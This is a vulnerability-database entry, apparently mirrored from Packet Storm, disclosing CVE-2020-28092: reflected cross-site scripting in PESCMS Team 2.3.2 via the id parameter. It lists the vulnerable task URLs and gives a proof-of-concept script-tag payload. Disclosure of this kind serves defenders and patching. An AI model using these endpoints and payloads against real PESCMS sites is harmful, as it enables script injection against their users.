Lucene search
IcekamPACKETSTORM:160128HistoryNov 19, 2020 - 12:00 a.m.
PESCMS TEAM 2.3.2 Cross Site Scripting
2020-11-1900:00:00
icekam
packetstormsecurity.com
549
pescms team 2.3.2
reflected xss
id parameter
security vulnerability
github issue
EPSS
0.003
Percentile
66.5%
`# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.pescms.com/
# Software Link: https://github.com/lazyphp/PESCMS-TEAM
# Version: PESCMS Team 2.3.2
# CVE: CVE-2020-28092
PESCMS Team 2.3.2 has multiple reflected XSS via the id
parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id=
please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6
now I input payload :
"><ScRiPt>alert(1)</ScRiPt>
`
Related
cvelist
cvelist
CVE-2020-28092
2020-11-17 21:44:09
prion
prion
Cross site scripting
2020-11-17 22:15:00
nvd
nvd
CVE-2020-28092
2020-11-17 22:15:12
osv
osv
CVE-2020-28092
2020-11-17 22:15:12
cnvd
cnvd
PESCMS Team Cross-Site Scripting Vulnerability
2020-11-18 00:00:00
exploitdb
exploitdb
PESCMS TEAM 2.3.2 - Multiple Reflected XSS
2020-11-19 00:00:00
cve
cve
CVE-2020-28092
2020-11-17 22:15:12